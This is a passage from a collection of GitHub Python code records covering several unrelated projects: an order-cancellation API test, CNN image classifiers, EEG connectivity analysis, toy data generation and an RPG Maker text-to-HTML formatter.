import models\n\nPROCESSING_FLOW_VERSION = 'grocery_flow_v3'\n\n\n@pytest.mark.parametrize(\n 'cancel_order_reason', ['depot_no_product', 'courier_being_late', None],\n)\n@pytest.mark.parametrize(\n 'order_status,response_status,create_event',\n [\n ('closed', 400, False),\n ('canceled', 400, False),\n ('pending_cancel', 400, False),\n ('reserving', 202, True),\n # Forbidden by default, allowed by confing\n ('delivering', 202, True),\n ],\n)\n@pytest.mark.experiments3(\n name='lavka_order_cancel_allowed_statuses',\n consumers=['grocery-orders/submit'],\n match={'predicate': {'type': 'true'}, 'enabled': True},\n clauses=[\n {\n 'title': 'Always enabled',\n 'predicate': {'type': 'true'},\n 'value': {\n 'enabled': True,\n 'statuses': ['created', 'assembling', 'assembled'],\n },\n },\n ],\n default_value={},\n is_config=True,\n)\n@pytest.mark.now(consts.NOW)\nasync def test_basic(\n taxi_grocery_orders,\n pgsql,\n processing,\n grocery_depots,\n grocery_cart,\n order_status,\n response_status,\n create_event,\n cancel_order_reason,\n):\n order = models.Order(\n pgsql=pgsql,\n status=order_status,\n grocery_flow_version=PROCESSING_FLOW_VERSION,\n )\n\n grocery_cart.set_cart_data(cart_id=order.cart_id)\n grocery_depots.add_depot(legacy_depot_id=order.depot_id)\n\n response = await taxi_grocery_orders.post(\n '/orders/v1/integration-api/v1/actions/cancel',\n json={'order_id': order.order_id, 'reason': cancel_order_reason},\n )\n\n assert response.status_code == response_status\n order.update()\n\n events = list(processing.events(scope='grocery', queue='processing'))\n if create_event:\n assert len(events) == 1\n\n cancel_reason_message = 'Got cancel request from user'\n\n assert events[0].payload == {\n 'reason': 'cancel',\n 'cancel_reason_type': 'user_request',\n 'payload': {\n 'event_created': consts.NOW,\n 'initial_event_created': consts.NOW,\n },\n 'cancel_reason_message': cancel_reason_message,\n 'order_id': order.order_id,\n 'flow_version': PROCESSING_FLOW_VERSION,\n 'times_called': 0,\n }\n assert order.desired_status == 'canceled'\n else:\n assert not events\n assert order.desired_status is None\n","repo_name":"Alexander-Berg/2022-tests-examples-2","sub_path":"Taxi/tests_grocery_orders/test_integration_api_actions_cancel.py","file_name":"test_integration_api_actions_cancel.py","file_ext":"py","file_size_in_byte":2552,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"21666794909","text":"#!usr/bin/env python3\ngenes={}\nseq_read=open(\"Python_06.seq.txt\",\"r\")\nfor line in seq_read:\n line=line.rstrip()\n gene_id,seq=line.split()\n genes[gene_id]=seq\nprint(genes)\n\n\n","repo_name":"aparnamt/aparna","sub_path":"python_06.seq.py","file_name":"python_06.seq.py","file_ext":"py","file_size_in_byte":176,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"3264658382","text":"import torch\nfrom torchvision import transforms as T\nfrom PIL import Image\nimport os\nimport numpy as np\nimport cv2\nimport timeit\n\n\n# datasets = SIP , DUT-RGBD , NLPR , NJU2K\nmodel_path = os.path.join('TrainedModels\\\\DDNet_500Model.pt')\nmodel = torch.load(model_path)\nmodel.eval()\nkernel = np.ones((5,5), np.uint8)\n\ndef preprocess_image(img):\n transform = T.Compose([T.Resize((224, 224)), T.ToTensor()])\n x = transform(img)\n x = torch.unsqueeze(x, 0)\n x = x.cuda(0)\n return x\ndef predictions(img):\n\n x = preprocess_image(img)\n start_time = timeit.default_timer()\n output = model(x)\n 
output = torch.squeeze(output, 0)\n\n output = output.detach().cpu().numpy()\n output = output.dot(255)\n output *= output.max()/255.0\n # print (max(output))\n # output = cv2.erode(output, kernel, iterations=2)\n # output = cv2.dilate(output, kernel, iterations=1)\n return output\n\ndef testing_code_dir(input_dir, output_dir):\n\n val_base_path_images = os.listdir(input_dir)\n for single_image in val_base_path_images:\n full_path = input_dir + single_image\n\n img = Image.open(full_path).convert(\"RGB\")\n\n output = predictions(img)\n output = np.transpose(output, (1, 2, 0))\n # cv2.imshow('', output)\n # cv2.waitKey(50)\n\n output_path = output_dir + single_image[0:(len(single_image) - 3)] + \"png\"\n cv2.imwrite(output_path, output)\n print(\"Reading: %s\\n writing: %s \" % (full_path, output_path))\n\n# # testing code SIP\ninput_dir = r'D:\\My Research\\Datasets\\Saliency Detection\\RGBD\\SIP\\Test\\Images\\\\'\noutput_dir = r'C:\\Users\\user02\\Documents\\GitHub\\EfficientSOD\\SIP\\\\'\ntesting_code_dir(input_dir,output_dir)\n","repo_name":"tanveer-hussain/EfficientSOD","sub_path":"Testing.py","file_name":"Testing.py","file_ext":"py","file_size_in_byte":1695,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"66"} +{"seq_id":"40968876460","text":"import sys\nfrom matplotlib import pyplot\nfrom numpy.lib.npyio import load\nfrom tensorflow.keras.utils import to_categorical\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Conv2D\nfrom tensorflow.keras.layers import MaxPooling2D\nfrom tensorflow.keras.layers import Dense\nfrom tensorflow.keras.layers import Flatten\nfrom tensorflow.keras.layers import Dropout\nfrom tensorflow.keras.optimizers import SGD\nimport os\nimport cv2\nimport glob \nimport numpy as np\nfrom PIL import Image\n\n# load train and test dataset\ndef load_dataset():\n\t# load dataset\n sys.path.append('./cs231n')\n from data_utils import load_CIFAR10\n cifar10_dir = './cs231n/datasets/cifar-10-batches-py'\n \n trainX, trainY, testX, testY = load_CIFAR10(cifar10_dir) \n\t#(trainX, trainY), (testX, testY) = cifar10.load_data()\n\t# one hot encode target values\n trainY = to_categorical(trainY)\n testY = to_categorical(testY)\n return trainX, trainY, testX, testY\n\n# scale pixels\ndef prep_pixels(train, test):\n\t# convert from integers to floats\n\ttrain_norm = train.astype('float32')\n\ttest_norm = test.astype('float32')\n\t# normalize to range 0-1\n\ttrain_norm = train_norm / 255.0\n\ttest_norm = test_norm / 255.0\n\t# return normalized images\n\treturn train_norm, test_norm\n \n\ndef define_model_one_VGG_block():\n model = Sequential()\n model.add(Conv2D(32, (3, 3), activation='relu', kernel_initializer='he_uniform', padding='same', input_shape=(32, 32, 3)))\n model.add(Conv2D(32, (3, 3), activation='relu', kernel_initializer='he_uniform', padding='same'))\n model.add(MaxPooling2D((2, 2)))\n model.add(Flatten())\n model.add(Dense(128, activation='relu', kernel_initializer='he_uniform'))\n model.add(Dense(10, activation='softmax'))\n # compile model\n opt = SGD(learning_rate=0.001, momentum=0.9)\n model.compile(optimizer=opt, loss='categorical_crossentropy', metrics=['accuracy'])\n return model\n\ndef define_model_two_VGG_blocks():\n\tmodel = Sequential()\n\tmodel.add(Conv2D(32, (3, 3), activation='relu', kernel_initializer='he_uniform', padding='same', input_shape=(32, 32, 3)))\n\tmodel.add(Conv2D(32, (3, 3), activation='relu', kernel_initializer='he_uniform', 
padding='same'))\n\tmodel.add(MaxPooling2D((2, 2)))\n\tmodel.add(Conv2D(64, (3, 3), activation='relu', kernel_initializer='he_uniform', padding='same'))\n\tmodel.add(Conv2D(64, (3, 3), activation='relu', kernel_initializer='he_uniform', padding='same'))\n\tmodel.add(MaxPooling2D((2, 2)))\n\tmodel.add(Flatten())\n\tmodel.add(Dense(128, activation='relu', kernel_initializer='he_uniform'))\n\tmodel.add(Dense(10, activation='softmax'))\n\t# compile model\n\topt = SGD(learning_rate=0.001, momentum=0.9)\n\tmodel.compile(optimizer=opt, loss='categorical_crossentropy', metrics=['accuracy'])\n\treturn model\n\ndef define_model_three_VGG_blocks():\n\tmodel = Sequential()\n\tmodel.add(Conv2D(32, (3, 3), activation='relu', kernel_initializer='he_uniform', padding='same', input_shape=(32, 32, 3)))\n\tmodel.add(Conv2D(32, (3, 3), activation='relu', kernel_initializer='he_uniform', padding='same'))\n\tmodel.add(MaxPooling2D((2, 2)))\n\tmodel.add(Conv2D(64, (3, 3), activation='relu', kernel_initializer='he_uniform', padding='same'))\n\tmodel.add(Conv2D(64, (3, 3), activation='relu', kernel_initializer='he_uniform', padding='same'))\n\tmodel.add(MaxPooling2D((2, 2)))\n\tmodel.add(Conv2D(128, (3, 3), activation='relu', kernel_initializer='he_uniform', padding='same'))\n\tmodel.add(Conv2D(128, (3, 3), activation='relu', kernel_initializer='he_uniform', padding='same'))\n\tmodel.add(MaxPooling2D((2, 2)))\n\tmodel.add(Flatten())\n\tmodel.add(Dense(128, activation='relu', kernel_initializer='he_uniform'))\n\tmodel.add(Dense(10, activation='softmax'))\n\t# compile model\n\topt = SGD(learning_rate=0.001, momentum=0.9)\n\tmodel.compile(optimizer=opt, loss='categorical_crossentropy', metrics=['accuracy'])\n\treturn model\n\n# define cnn model\ndef define_model_with_dropout_reg_three_VGG_blocks(drop_out_rate_first_block, drop_out_rate_second_block, drop_out_rate_third_block):\n model = Sequential()\n model.add(Conv2D(32, (3, 3), activation='relu', kernel_initializer='he_uniform', padding='same', input_shape=(32, 32, 3)))\n model.add(Conv2D(32, (3, 3), activation='relu', kernel_initializer='he_uniform', padding='same'))\n model.add(MaxPooling2D((2, 2)))\n model.add(Dropout(drop_out_rate_first_block))\n model.add(Conv2D(64, (3, 3), activation='relu', kernel_initializer='he_uniform', padding='same'))\n model.add(Conv2D(64, (3, 3), activation='relu', kernel_initializer='he_uniform', padding='same'))\n model.add(MaxPooling2D((2, 2)))\n model.add(Dropout(drop_out_rate_second_block))\n model.add(Conv2D(128, (3, 3), activation='relu', kernel_initializer='he_uniform', padding='same'))\n model.add(Conv2D(128, (3, 3), activation='relu', kernel_initializer='he_uniform', padding='same'))\n model.add(MaxPooling2D((2, 2)))\n model.add(Dropout(drop_out_rate_third_block))\n model.add(Flatten())\n model.add(Dense(128, activation='relu', kernel_initializer='he_uniform'))\n model.add(Dropout(0.2))\n model.add(Dense(10, activation='softmax'))\n # compile model\n opt = SGD(learning_rate=0.001, momentum=0.9)\n model.compile(optimizer=opt, loss='categorical_crossentropy', metrics=['accuracy'])\n return model\n \n# plot diagnostic learning curves\ndef summarize_diagnostics(filename, history):\n\t# plot loss\n pyplot.subplot(211)\n pyplot.title('Cross Entropy Loss')\n pyplot.plot(history.history['loss'], color='blue', label='train')\n pyplot.plot(history.history['val_loss'], color='orange', label='test')\n # plot accuracy\n pyplot.subplot(212)\n pyplot.title('Classification Accuracy')\n pyplot.plot(history.history['accuracy'], color='blue', 
label='train')\n pyplot.plot(history.history['val_accuracy'], color='orange', label='test')\n # save plot to file\n # filename = sys.argv[0].split('/')[-1]\n pyplot.tight_layout()\n pyplot.savefig(filename + '_plot.png')\n pyplot.close()\n\ndef save_model(model, name):\n #Since we appended cs231\n sys.path.remove('../cs231n')\n model.save('./models/' + name)\n\ndef save_summed_results(details_about_model, acc):\n f = open(\"./results/summed_res.txt\", \"a\")\n f.write(details_about_model, \", Accuracy: \", acc)\n f.close()\n\n\n\ndef convert_images_to_arr(images):\n res = []\n\n for img in images:\n img = Image.open(img)\n rezised_img = img.resize((32, 32))\n data = np.asarray(rezised_img)\n res.append(data)\n\n return res\n\ndef load_images_from_folder(folder):\n res = []\n path = folder + \"/*.jpg\"\n for img in glob.glob(path):\n res.append(img)\n\n return convert_images_to_arr(res)\n\ndef load_medical_data():\n test_acne_x = load_images_from_folder('./skin_disease_data/test/Acne_and_Rosacea_Photos')\n test_acne_y = np.empty(len(test_acne_x))\n test_acne_y.fill(0)\n\n test_actinic_x = load_images_from_folder('./skin_disease_data/test/Actinic Keratosis Basal Cell Carcinoma and other Malignant Lesions')\n test_actinic_y = np.empty(len(test_actinic_x))\n test_actinic_y.fill(1)\n\n test_atopic_x = load_images_from_folder('./skin_disease_data/test/Atopic Dermatitis Photos')\n test_atopic_y = np.empty(len(test_atopic_x))\n test_atopic_y.fill(1)\n\n test_bullous_x = load_images_from_folder('./skin_disease_data/test/Bullous Disease Photos')\n test_bullous_y = np.empty(len(test_bullous_x))\n test_bullous_y.fill(1)\n\n test_cellulitis_x = load_images_from_folder('./skin_disease_data/test/Cellulitis Impetigo and other Bacterial Infections')\n test_cellulitis_y = np.empty(len(test_cellulitis_x))\n test_cellulitis_y.fill(1)\n\n test_eczema_x = load_images_from_folder('./skin_disease_data/test/Eczema Photos')\n test_eczema_y = np.empty(len(test_eczema_x))\n test_eczema_y.fill(1)\n\n test_exanthems_x = load_images_from_folder('./skin_disease_data/test/Exanthems and Drug Eruptions')\n test_exanthems_y = np.empty(len(test_exanthems_x))\n test_exanthems_y.fill(1)\n\n test_hair_loss_alopecia_x = load_images_from_folder('./skin_disease_data/test/Hair Loss Photos Alopecia and other Hair Diseases')\n test_hair_loss_alopecia_y = np.empty(len(test_hair_loss_alopecia_x))\n test_hair_loss_alopecia_y.fill(1)\n\n test_herpes_x = load_images_from_folder('./skin_disease_data/test/Herpes HPV and other STDs Photos')\n test_herpes_y = np.empty(len(test_herpes_x))\n test_herpes_y.fill(1)\n\n test_light_diseases_x = load_images_from_folder('./skin_disease_data/test/Light Diseases and Disorders of Pigmentation')\n test_light_diseases_y = np.empty(len(test_light_diseases_x))\n test_light_diseases_y.fill(1)\n\n test_lupus_x = load_images_from_folder('./skin_disease_data/test/Lupus and other Connective Tissue diseases')\n test_lupus_y = np.empty(len(test_lupus_x))\n test_lupus_y.fill(1)\n\n test_melanoma_x = load_images_from_folder('./skin_disease_data/test/Melanoma Skin Cancer Nevi and Moles')\n test_melanoma_y = np.empty(len(test_melanoma_x))\n test_melanoma_y.fill(1)\n \n test_nail_fungus_x = load_images_from_folder('./skin_disease_data/test/Nail Fungus and other Nail Disease')\n test_nail_fungus_y = np.empty(len(test_nail_fungus_x))\n test_nail_fungus_y.fill(1)\n\n test_poison_ivy_x = load_images_from_folder('./skin_disease_data/test/Poison Ivy Photos and other Contact Dermatitis')\n test_poison_ivy_y = 
np.empty(len(test_poison_ivy_x))\n test_poison_ivy_y.fill(1)\n\n test_psoriasis_x = load_images_from_folder('./skin_disease_data/test/Psoriasis pictures Lichen Planus and related diseases')\n test_psoriasis_y = np.empty(len(test_psoriasis_x))\n test_psoriasis_y.fill(1)\n\n test_scabies_lyme_x = load_images_from_folder('./skin_disease_data/test/Scabies Lyme Disease and other Infestations and Bites')\n test_scabies_lyme_y = np.empty(len(test_scabies_lyme_x))\n test_scabies_lyme_y.fill(1)\n\n test_seborrheic_keratoses_x = load_images_from_folder('./skin_disease_data/test/Seborrheic Keratoses and other Benign Tumors')\n test_seborrheic_keratoses_y = np.empty(len(test_seborrheic_keratoses_x))\n test_seborrheic_keratoses_y.fill(1)\n\n test_systemic_disease_x = load_images_from_folder('./skin_disease_data/test/Systemic Disease')\n test_systemic_disease_y = np.empty(len(test_systemic_disease_x))\n test_systemic_disease_y.fill(1)\n\n test_tinea_ringworm_x = load_images_from_folder('./skin_disease_data/test/Tinea Ringworm Candidiasis and other Fungal Infections')\n test_tinea_ringworm_y = np.empty(len(test_tinea_ringworm_x))\n test_tinea_ringworm_y.fill(1)\n\n test_urticaria_hives_x = load_images_from_folder('./skin_disease_data/test/Urticaria Hives')\n test_urticaria_hives_y = np.empty(len(test_urticaria_hives_x))\n test_urticaria_hives_y.fill(1)\n\n test_vascular_tumors_x = load_images_from_folder('./skin_disease_data/test/Vascular Tumors')\n test_vascular_tumors_y = np.empty(len(test_vascular_tumors_x))\n test_vascular_tumors_y.fill(1)\n\n test_vasculitis_x = load_images_from_folder('./skin_disease_data/test/Vasculitis Photos')\n test_vasculitis_y = np.empty(len(test_vasculitis_x))\n test_vasculitis_y.fill(1)\n\n test_warts_molluscum_x = load_images_from_folder('./skin_disease_data/test/Warts Molluscum and other Viral Infections')\n test_warts_molluscum_y = np.empty(len(test_warts_molluscum_x))\n test_warts_molluscum_y.fill(1)\n\n \n # acneY = #Np.array af samme længde, og med værdi 1 for hver\n return convert_images_to_arr(acne)\n \ndef run_test_harness():\n\n load_medical_data()\n # sys.path.append('../skin_disease_data')\n # print(os.system(\"dir\"))\n # acne = load_medical_data()\n # print(type(acne))\n # print(acne.shape)\n\n a = \"\"\n\n # print(\" > Loading dataset...\")\n # trainX, trainY, testX, testY = load_dataset()\n # a = \"\"\n # print(\" > Preprocessing dataset...\")\n # trainX, testX = prep_pixels(trainX, testX)\n\n # print(\"Shapes:\")\n # print(\"Train xy: \", trainX.shape, \", \", trainY.shape)\n # print(\"Test xy: \", testX.shape, \", \", testY.shape)\n \n # print(\" > Dataset loaded...\")\n # print(\" > Defining model...\")\n # #model = define_model_one_VGG_block()\n # model = define_model_two_VGG_blocks()\n \n # print(\" > Fitting model...\")\n # history = model.fit(trainX, trainY, epochs=100, batch_size=64, validation_data=(testX, testY), verbose=0)\n # print(\" > Model finished fitting...\")\n\n # print(\" > Evaluating model...\")\n # _, acc = model.evaluate(testX, testY, verbose=0)\n # print(\" > Accuracy: \", '> %.3f' % (acc * 100.0))\n \n # print(\" > Summarizing diagnostics and saving model...\")\n # summarize_diagnostics('two_VGG_epoch100_batch64', history)\n # save_model(model, 'two_VGG_epoch100_batch64')\n # save_summed_results('two_VGG_epoch100_batch64', acc)\n \n# entry point, run the test 
harness\nrun_test_harness()","repo_name":"OskarSkak/healthcare_deep_learning","sub_path":"CNNs/StandAloneModel.py","file_name":"StandAloneModel.py","file_ext":"py","file_size_in_byte":12871,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"72644186130","text":"\"\"\"\n @author : macab (macab@debian)\n @file : countsetbits\n @created : Saturday Mar 30, 2019 18:59:20 IST\n\"\"\"\n\ndef countsetbits(n):\n count = 0\n while n > 0:\n count += 1\n n = n & (n - 1)\n return count\n\nprint(countsetbits(7))\n\n","repo_name":"macabdul9/python-learning","sub_path":"basics/countsetbits.py","file_name":"countsetbits.py","file_ext":"py","file_size_in_byte":257,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"9887642749","text":"import numpy as np\nimport pandas as pd\n\n#variables for training\ntrainingVariables = [\"var1\", \"var2\", \"var3\", \"VOI\"]\n\n#Class for generating toy data to demonstrate classifier decorrelation\nclass dataGenerator:\n def __init__(self):\n self.variableNames = [\"var1\", \"var2\", \"var3\", \"VOI\", \"isSignal\"]\n self.ranges = [(0.0, 1.0), (0.0, 1.0), (0.0, 300.0), (0.0, 300.0)]\n\n def getSignal(self, nSamples):\n # massPoints = [100, 250, 400, 550]\n massPoints = [250]\n\n width = 20\n df = pd.DataFrame(columns=self.variableNames+[\"massPoint\"])\n for point in massPoints:\n _nSamples = int(nSamples/len(massPoints))\n var1 = np.arcsin(np.random.uniform(self.ranges[0][0], self.ranges[0][1], _nSamples))\n var2 = np.random.uniform(self.ranges[1][0], self.ranges[1][1], _nSamples)\n VOI = np.random.normal(point, width, _nSamples)\n var3 = np.log(1.0+VOI.copy())\n massPoint = np.ones(_nSamples)*point\n isSignal = np.ones(_nSamples)\n dataframe = pd.DataFrame(data=np.column_stack((var1, var2, var3, VOI, isSignal, massPoint)), columns=self.variableNames+[\"massPoint\"])\n df = pd.concat([df, dataframe], axis=0)\n return df\n\n\n def getBackground(self, nSamples):\n var1 = np.arccos(np.random.uniform(self.ranges[0][0], self.ranges[0][1], nSamples))\n var2 = np.random.uniform(self.ranges[1][0], self.ranges[1][1], nSamples)\n VOI = np.random.exponential(300, nSamples)\n # VOI = np.random.uniform(0.0, 800.0, nSamples)\n # var3 = np.log(1.0+VOI)\n var3 = np.log(1.0+VOI.copy())\n isSignal = np.zeros(nSamples)\n massPoint = np.ones(nSamples)\n\n dataframe = pd.DataFrame(data=np.column_stack((var1, var2, var3, VOI, isSignal, massPoint)), columns=self.variableNames+[\"massPoint\"])\n return dataframe","repo_name":"hajohajo/toyModelDistanceDecorrelation","sub_path":"dataGenerator.py","file_name":"dataGenerator.py","file_ext":"py","file_size_in_byte":1892,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"22629045572","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\ndef f (x):\n\treturn (1)\n\nxmax = 500.0\nxmin = -500.0\n\nnpts = 256\ndelta = (xmax-xmin)/(npts-1)\t #define sample spacing\n\nxarray = np.zeros(npts)\nsdata = np.zeros(npts)\n\n\nfor i in range(npts):\n\tsdata[i]=f(xmin+i*delta)\n\txarray[i]=xmin+i*delta\n\t\n\t\t\n\nnft = (np.fft.fft(sdata,norm='ortho')) #performing DFT\nkarray = np.fft.fftfreq(npts, d=delta)\t\t#sampling the frequency\nkarray = 2*np.pi*karray\nfactor = np.exp(-1j*karray*xmin)\naft = delta*np.sqrt(npts/(2.0*np.pi))*factor*nft\t#Numerical fourier transform\n\nk=np.linspace(-8,8,npts)\nrkarr=np.asarray(k)\nrft= np.zeros(npts)\nfor i in 
range(0,npts):\n\tif(rkarr[i]>=-1 and rkarr[i]<=1):\t\t\n\t\trft[i]=np.sqrt(np.pi/2.0)\n\n#plt.plot(karray,aft,'-*',color='r')\n#plt.plot(rkarr,rft)\n#print(karray.shape)\n#plt.xlabel('k')\n#plt.ylabel('f(k)')\n#plt.show()\n","repo_name":"aritragon/Assignment3","sub_path":"q6.py","file_name":"q6.py","file_ext":"py","file_size_in_byte":838,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"21528399862","text":"import html\nfrom rpgmv import RpgLexer\n\nyttdColors = {\n\t0: \"#ffffff\",\n\t1: \"#20a0d6\",\n\t2: \"#ff784c\",\n\t3: \"#66cc40\",\n\t4: \"#99ccff\",\n\t5: \"#ccc0ff\",\n\t6: \"#ffffa0\",\n\t7: \"#808080\",\n\t8: \"#c0c0c0\",\n\t9: \"#2080cc\",\n\t10: \"#ff3810\",\n\t11: \"#00a010\",\n\t12: \"#3e9ade\",\n\t13: \"#a098ff\",\n\t14: \"#ffcc20\",\n\t15: \"#000000\",\n\t16: \"#84aaff\",\n\t17: \"#ffff40\",\n\t18: \"#ff2020\",\n\t19: \"#202040\",\n\t20: \"#e08040\",\n\t21: \"#f0c040\",\n\t22: \"#4080c0\",\n\t23: \"#40c0f0\",\n\t24: \"#80ff80\",\n\t25: \"#c08080\",\n\t26: \"#8080ff\",\n\t27: \"#ff80ff\",\n\t28: \"#00a040\",\n\t29: \"#00e060\",\n\t30: \"#a060e0\",\n\t31: \"#c080ff\"\n}\n\nclass HtmlFormatter:\n\tcolors = {}\n\tvariables = {}\n\tactorNames = {}\n\tpartyMemberNames = {}\n\ticons = {}\n\tcurrency = \"Yen\"\n\tdefaultFontSize = 12\n\tfontUnit = \"pt\"\n\n\tcolorSupplier = lambda self, v : self.colors[v]\n\tvariableSupplier = lambda self, v : self.variables[v]\n\tactorNameSupplier = lambda self, v : self.actorNames[v]\n\tpartyMemberSupplier = lambda self, v : self.partyMemberNames[v]\n\ticonSupplier = lambda self, v : self.icons[v]\n\n\toutput = \"\"\n\tisSpanOpen = False\n\tcurrentStyle = {}\n\n\tdef reset(self):\n\t\tself.output = \"\"\n\t\tself.isSpanOpen = False\n\t\tself.currentStyle = { \"font-size\": self.defaultFontSize, \"color\": self.colorSupplier(0) }\n\n\tdef serializeCss(self, params) -> str:\n\t\tcss = \"\"\n\n\t\tfor key in params:\n\t\t\tcss += key\n\t\t\tcss += \": \"\n\t\t\tcss += str(params[key])\n\t\t\tif key == \"font-size\":\n\t\t\t\tcss += self.fontUnit\n\t\t\tcss += \"; \"\n\n\t\treturn css.strip()\n\n\tdef applyStyle(self): # needs to be called at each text write\n\t\tif len(self.currentStyle) != 0:\n\t\t\tself.isSpanOpen = True\n\t\t\tself.output += f'<span style=\"{self.serializeCss(self.currentStyle)}\">'\n\n\tdef doTheThing(self, tokens) -> str:\n\t\tfor t in tokens:\n\t\t\tif isinstance(t, RpgLexer.RPGText):\n\t\t\t\tself.applyStyle()\n\t\t\t\tself.output += html.escape(t.toFormattedText()).replace(\"\\n\", \"<br>\")\n\t\t\telif isinstance(t, RpgLexer.RPGToken):\n\t\t\t\tif self.isSpanOpen:\n\t\t\t\t\tself.output += \"</span>\"\n\t\t\t\t\tself.isSpanOpen = False\n\n\t\t\t\tif t.tag == \"C\":\n\t\t\t\t\tself.currentStyle[\"color\"] = self.colorSupplier(int(t.argument))\n\t\t\t\telif t.tag == \"V\":\n\t\t\t\t\tself.applyStyle()\n\t\t\t\t\tself.output += self.variableSupplier(int(t.argument))\n\t\t\t\telif t.tag == \"N\":\n\t\t\t\t\tself.applyStyle()\n\t\t\t\t\tself.output += self.actorNameSupplier(int(t.argument))\n\t\t\t\telif t.tag == \"O\":\n\t\t\t\t\tself.applyStyle()\n\t\t\t\t\tself.output += self.partyMemberSupplier(int(t.argument))\n\t\t\t\telif t.tag == \"I\":\n\t\t\t\t\tself.applyStyle()\n\t\t\t\t\tself.output += f'\"{t.argument}\"'\n\t\t\t\telif t.tag == \"G\":\n\t\t\t\t\tself.applyStyle()\n\t\t\t\t\tself.output += self.currency\n\t\t\t\telif t.tag == \"{\":\n\t\t\t\t\tif not \"font-size\" in self.currentStyle:\n\t\t\t\t\t\tself.currentStyle[\"font-size\"] = self.defaultFontSize\n\t\t\t\t\tself.currentStyle[\"font-size\"] += 1\n\t\t\t\telif t.tag == \"}\":\n\t\t\t\t\tif not \"font-size\" in self.currentStyle:\n\t\t\t\t\t\tself.currentStyle[\"font-size\"] = self.defaultFontSize\n\t\t\t\t\tself.currentStyle[\"font-size\"] -= 1\n\n\t\tif self.isSpanOpen:\n\t\t\tself.output += \"
    \"\n\t\treturn self.output\n","repo_name":"vinceh121/weblate-rpgmaker-mv","sub_path":"rpgmv/HtmlFormatter.py","file_name":"HtmlFormatter.py","file_ext":"py","file_size_in_byte":2976,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"19970946282","text":"import os\r\nimport numpy as np\r\nimport connectivipy as cp\r\nfrom preprocess import preprocess\r\nfrom MEMD_all import memd\r\n\r\n'''\r\nKey Arguements:\r\n Function to get adjacency matrix corresponding to top 10 Effective connectivity estimated by Partial Directed Coherence\r\n'''\r\ndef PDC(filepath,index):\r\n\r\n y = preprocess(filepath,index)\r\n \r\n imf = memd(y)\r\n #returns a 3D matrix 'imf(M,N,L)' containing M multivariate IMFs, one IMF per column, computed by applying\r\n #the multivariate EMD algorithm on the N-variate signal (time-series) X of length L.\r\n \r\n '''\r\n IMF1 is shown to contain maximum information content among the estimated IMFs, hence taken.\r\n '''\r\n \r\n IMF1 = imf[0,:,:]\r\n \r\n model_coeff, reflection_matrix = cp.mvarmodel.Mvar.fit(IMF1, order = None, method = 'ns')\r\n PDC = cp.conn.pdc_fun(model_coeff,reflection_matrix,250,512)\r\n PDC = np.square(PDC)\r\n \r\n \r\n '''\r\n Out-in rates are calculated and corresponding ratios are estimated for all channels.\r\n '''\r\n \r\n delta = np.zeros((512,9)).astype(float)\r\n out_info = np.zeros((512,9)).astype(float)\r\n in_info = np.zeros((512,9)).astype(float)\r\n \r\n for f in range(512):\r\n for i in range(9):\r\n s = 0\r\n for j in range(9):\r\n s += PDC[f,j,i]\r\n out_info[f,i] = s\r\n r = 0\r\n for k in range(9):\r\n r = r + PDC[f,i,k]\r\n in_info[f,i] = r\r\n delta[f,i] = out_info[f][i]/in_info[f][i]\r\n \r\n '''\r\n Spectral points in the frequency range from [13-25](Beta Band) are taken to study effective connectivity.\r\n '''\r\n p = np.zeros((9,9))\r\n A = np.zeros((9,9))\r\n f = np.linspace(0,125,num = 512)\r\n count = 0\r\n for (ind,f) in enumerate(f):\r\n if f>=13 and f<=25:\r\n p = p + PDC[ind,:,:]\r\n count = count + 1\r\n if f>25:\r\n break\r\n p = p/count\r\n \r\n \r\n '''\r\n Top 10 ECs in the PDC are estimated and corresponding adjacency matrix is returned.\r\n '''\r\n \r\n ii = np.unravel_index(np.argsort(p.ravel())[-30:], p.shape)\r\n count = 0\r\n for i in range(30):\r\n if ii[1][29-i]!= ii[0][29-i]:\r\n A[ii[1][29-i]][ii[0][29-i]] = 1\r\n print(ii[0][29-i],ii[1][29-i])\r\n count = count + 1\r\n if count == 10:\r\n break\r\n \r\n return A\r\n","repo_name":"Sirish07/Effective-Connectivity-in-Brain-during-MI-tasks","sub_path":"PDC.py","file_name":"PDC.py","file_ext":"py","file_size_in_byte":2417,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"7890476535","text":"\ndef get_msd_test_hyperparameters():\n # Main\n model_type = \"msdnet\"\n n_epochs = 2\n gpu = -1\n\n # Network\n network_hyperparameters = get_network_hyperparameters(model_type)\n # Losses\n loss_hyperparameters = get_loss_hyperparameters(network_hyperparameters[\"n_exits\"], model_type)\n test_loss_hyperparameters = get_test_hyperparameters(network_hyperparameters[\"n_exits\"], model_type)\n # Train and Val \n loader_hyperparameters = get_loader_hyperparameters()\n # Optimizer and Scheduler\n opt_hyperparameters, sched_hyperparameters = get_opt_sched_hyperparameters()\n\n \n hyperparameters = dict(\n network = network_hyperparameters,\n loss = loss_hyperparameters,\n optimizer = opt_hyperparameters,\n scheduler = sched_hyperparameters,\n 
